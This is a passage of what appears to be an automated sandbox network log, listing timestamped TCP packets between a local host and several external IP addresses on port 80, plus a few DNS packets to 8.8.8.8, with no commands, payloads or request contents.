                                                                          Jan 13, 2022 18:17:00.376584053 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376586914 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376604080 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376605034 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376616001 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376621008 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376631975 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376638889 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376656055 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376657009 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376671076 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376672983 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376688004 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376692057 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376702070 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376708984 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376718998 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376727104 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376739979 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376745939 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376758099 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376761913 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376775980 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376777887 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376794100 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376796007 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376811028 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376812935 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376827955 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376837969 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376843929 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376853943 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376861095 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376868963 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376878023 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376883030 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376893997 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376900911 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376913071 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376919031 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376930952 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376948118 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376954079 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376957893 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376966000 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376977921 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376981974 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376982927 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376998901 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377002954 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377021074 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377022028 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377037048 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377042055 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377055883 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377057076 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377073050 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377074003 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377089977 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377091885 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377109051 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377109051 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377121925 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377140045 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377146959 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377156973 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377163887 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377173901 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377187967 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377190113 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377207994 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377217054 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377223969 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377240896 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377248049 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377258062 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377274036 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377281904 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377290010 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377300024 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377306938 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377317905 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377324104 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377334118 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377340078 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377351046 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377357960 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377367973 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377373934 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377384901 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377389908 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377403975 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377407074 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377422094 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377429008 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377438068 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377444983 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377454042 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377460003 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377470016 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377480030 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377486944 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377504110 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377506971 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377518892 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377525091 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377535105 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377541065 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377552032 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377552032 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377568960 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377577066 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377583027 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377585888 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377588987 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377602100 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377610922 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377619028 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377629042 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377635002 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377636909 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377650976 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377654076 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377666950 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377671957 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377684116 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377690077 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377700090 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377707005 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377717018 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377722979 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377732992 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377738953 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377749920 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377756119 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377765894 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377774000 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377782106 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377789021 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377798080 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377806902 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377815008 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377825975 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377835035 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377863884 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377890110 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377912045 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377928019 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377933979 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377944946 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377952099 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377964020 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377966881 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377980947 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377988100 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378000021 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378005981 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378016949 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378021002 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378034115 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378040075 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378051043 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378055096 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378067970 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378072977 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378091097 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378092051 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378108025 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378110886 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378124952 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378129005 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378146887 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378148079 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378164053 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378165007 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378180981 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378181934 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378196955 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378199100 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378215075 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378216982 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378230095 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378232002 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378248930 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378251076 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378267050 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378267050 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378283978 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378283978 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378300905 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378307104 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378317118 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378333092 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378334999 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378349066 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378356934 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378360033 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378365993 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378371954 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378381968 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378390074 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378396988 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.378407001 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378424883 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378895998 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.378906012 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.405983925 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406018972 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406033993 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406050920 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406069040 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406085014 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406100988 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406119108 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406141996 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406158924 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406158924 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406176090 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406181097 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406183958 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406186104 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406187057 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406188965 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406192064 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406192064 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406194925 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406208992 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406224966 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406227112 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406241894 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406240940 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406259060 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406264067 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406267881 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406270027 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406275034 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406275988 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406291962 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406301022 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406305075 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406306982 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406318903 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406322956 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406337976 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406339884 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406342983 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406357050 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406359911 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406373978 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406375885 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406393051 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.406394005 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406419039 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.406480074 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.407536030 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.409226894 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:01.238079071 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:18:34.709387064 CET4916880192.168.2.2223.227.38.74
                                                                          Jan 13, 2022 18:18:34.728159904 CET804916823.227.38.74192.168.2.22
                                                                          Jan 13, 2022 18:18:34.728283882 CET4916880192.168.2.2223.227.38.74
                                                                          Jan 13, 2022 18:18:34.728436947 CET4916880192.168.2.2223.227.38.74
                                                                          Jan 13, 2022 18:18:34.746195078 CET804916823.227.38.74192.168.2.22
                                                                          Jan 13, 2022 18:18:34.850775003 CET804916823.227.38.74192.168.2.22
                                                                          Jan 13, 2022 18:18:34.850833893 CET804916823.227.38.74192.168.2.22
                                                                          Jan 13, 2022 18:18:34.850872040 CET804916823.227.38.74192.168.2.22
                                                                          Jan 13, 2022 18:18:34.850908041 CET804916823.227.38.74192.168.2.22
                                                                          Jan 13, 2022 18:18:34.850936890 CET804916823.227.38.74192.168.2.22
                                                                          Jan 13, 2022 18:18:34.850960016 CET804916823.227.38.74192.168.2.22
                                                                          Jan 13, 2022 18:18:34.850955963 CET4916880192.168.2.2223.227.38.74
                                                                          Jan 13, 2022 18:18:34.850986004 CET804916823.227.38.74192.168.2.22
                                                                          Jan 13, 2022 18:18:34.850987911 CET4916880192.168.2.2223.227.38.74
                                                                          Jan 13, 2022 18:18:34.851038933 CET4916880192.168.2.2223.227.38.74
                                                                          Jan 13, 2022 18:18:34.851058006 CET4916880192.168.2.2223.227.38.74
                                                                          Jan 13, 2022 18:18:34.851144075 CET4916880192.168.2.2223.227.38.74
                                                                          Jan 13, 2022 18:18:53.485584974 CET4917080192.168.2.2234.102.136.180
                                                                          Jan 13, 2022 18:18:53.504618883 CET804917034.102.136.180192.168.2.22
                                                                          Jan 13, 2022 18:18:53.504718065 CET4917080192.168.2.2234.102.136.180
                                                                          Jan 13, 2022 18:18:53.504982948 CET4917080192.168.2.2234.102.136.180
                                                                          Jan 13, 2022 18:18:53.523961067 CET804917034.102.136.180192.168.2.22
                                                                          Jan 13, 2022 18:18:53.620393038 CET804917034.102.136.180192.168.2.22
                                                                          Jan 13, 2022 18:18:53.620409966 CET804917034.102.136.180192.168.2.22
                                                                          Jan 13, 2022 18:18:53.620588064 CET4917080192.168.2.2234.102.136.180
                                                                          Jan 13, 2022 18:18:53.620749950 CET4917080192.168.2.2234.102.136.180
                                                                          Jan 13, 2022 18:18:53.639607906 CET804917034.102.136.180192.168.2.22
                                                                          Jan 13, 2022 18:18:58.768819094 CET4917180192.168.2.22109.94.209.123
                                                                          Jan 13, 2022 18:18:58.848622084 CET8049171109.94.209.123192.168.2.22
                                                                          Jan 13, 2022 18:18:58.848798037 CET4917180192.168.2.22109.94.209.123
                                                                          Jan 13, 2022 18:18:58.849119902 CET4917180192.168.2.22109.94.209.123
                                                                          Jan 13, 2022 18:18:58.928078890 CET8049171109.94.209.123192.168.2.22
                                                                          Jan 13, 2022 18:18:58.928126097 CET8049171109.94.209.123192.168.2.22
                                                                          Jan 13, 2022 18:18:58.928153038 CET8049171109.94.209.123192.168.2.22
                                                                          Jan 13, 2022 18:18:58.928354979 CET4917180192.168.2.22109.94.209.123
                                                                          Jan 13, 2022 18:18:58.928443909 CET4917180192.168.2.22109.94.209.123
                                                                          Jan 13, 2022 18:18:59.001502037 CET8049171109.94.209.123192.168.2.22
                                                                          Jan 13, 2022 18:19:03.976763964 CET4917280192.168.2.2291.195.240.13
                                                                          Jan 13, 2022 18:19:03.995702028 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:03.995799065 CET4917280192.168.2.2291.195.240.13
                                                                          Jan 13, 2022 18:19:03.995932102 CET4917280192.168.2.2291.195.240.13
                                                                          Jan 13, 2022 18:19:04.014612913 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.058167934 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.058192015 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.058206081 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.058223963 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.058233976 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.058247089 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.058264017 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.058280945 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.058293104 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.058305979 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.058319092 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.058331966 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.058343887 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.058370113 CET4917280192.168.2.2291.195.240.13
                                                                          Jan 13, 2022 18:19:04.058398962 CET4917280192.168.2.2291.195.240.13
                                                                          Jan 13, 2022 18:19:04.058418036 CET4917280192.168.2.2291.195.240.13
                                                                          Jan 13, 2022 18:19:04.058425903 CET4917280192.168.2.2291.195.240.13
                                                                          Jan 13, 2022 18:19:04.058438063 CET4917280192.168.2.2291.195.240.13
                                                                          Jan 13, 2022 18:19:04.058450937 CET4917280192.168.2.2291.195.240.13
                                                                          Jan 13, 2022 18:19:04.058454037 CET4917280192.168.2.2291.195.240.13
                                                                          Jan 13, 2022 18:19:04.058464050 CET4917280192.168.2.2291.195.240.13
                                                                          Jan 13, 2022 18:19:04.058466911 CET4917280192.168.2.2291.195.240.13
                                                                          Jan 13, 2022 18:19:04.058571100 CET4917280192.168.2.2291.195.240.13
                                                                          Jan 13, 2022 18:19:04.077091932 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.077117920 CET804917291.195.240.13192.168.2.22
                                                                          Jan 13, 2022 18:19:04.077178001 CET4917280192.168.2.2291.195.240.13
                                                                          Jan 13, 2022 18:19:04.078180075 CET4917280192.168.2.2291.195.240.13

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 13, 2022 18:17:00.061178923 CET5216753192.168.2.228.8.8.8
                                                                          Jan 13, 2022 18:17:00.109055042 CET53521678.8.8.8192.168.2.22
                                                                          Jan 13, 2022 18:18:34.665961027 CET5059153192.168.2.228.8.8.8
                                                                          Jan 13, 2022 18:18:34.698467016 CET53505918.8.8.8192.168.2.22
                                                                          Jan 13, 2022 18:18:53.462610960 CET5780553192.168.2.228.8.8.8
                                                                          Jan 13, 2022 18:18:53.484441042 CET53578058.8.8.8192.168.2.22
                                                                          Jan 13, 2022 18:18:58.635457993 CET5903053192.168.2.228.8.8.8
                                                                          Jan 13, 2022 18:18:58.766792059 CET53590308.8.8.8192.168.2.22
                                                                          Jan 13, 2022 18:19:03.935352087 CET5918553192.168.2.228.8.8.8
                                                                          Jan 13, 2022 18:19:03.973486900 CET53591858.8.8.8192.168.2.22
                                                                          Jan 13, 2022 18:19:09.561289072 CET5561653192.168.2.228.8.8.8
                                                                          Jan 13, 2022 18:19:09.586139917 CET53556168.8.8.8192.168.2.22

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
